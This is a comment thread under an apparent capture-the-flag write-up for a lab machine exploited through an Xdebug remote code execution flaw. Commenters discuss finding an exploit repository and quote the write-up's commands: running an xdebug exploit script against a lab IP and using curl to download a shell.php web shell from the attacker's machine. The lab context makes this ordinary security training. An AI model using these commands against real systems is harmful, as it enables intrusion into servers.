Comments

  • Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!

    Lesson learned, thanks.

  • edited October 2018

    Thank you very much for your writeups.

    May I ask you 2 questions:

    ..........Question 1:

    I wonder what keywords in Google you used to find this github.com link:
    https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce

    I tried these keywords in Google without success.
    Google:
    xdebug exploit
    xdebug exploit shell
    xdebug exploit rce
    xdebug exploit repository
    xdebug vulnerabilities
    xdebug php exploit

    ..........Question 2 has 2 sub questions:

    You wrote in your writeup:

    ./xdebug-shell.py -u http://10.10.10.83

    We upload a shell; from the obtained shell:

    curl -O http://miIp/shell.php

    ..........Is this "xdebug-shell.py" the code copied from
    https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
    ?

    ..........I guess
    miIp
    means
    the IP address of my Kali Linux?

    Please advise.

    Thanks a million.

  • I guess the keywords to search on google were:

    php debug rce

Sign In to comment.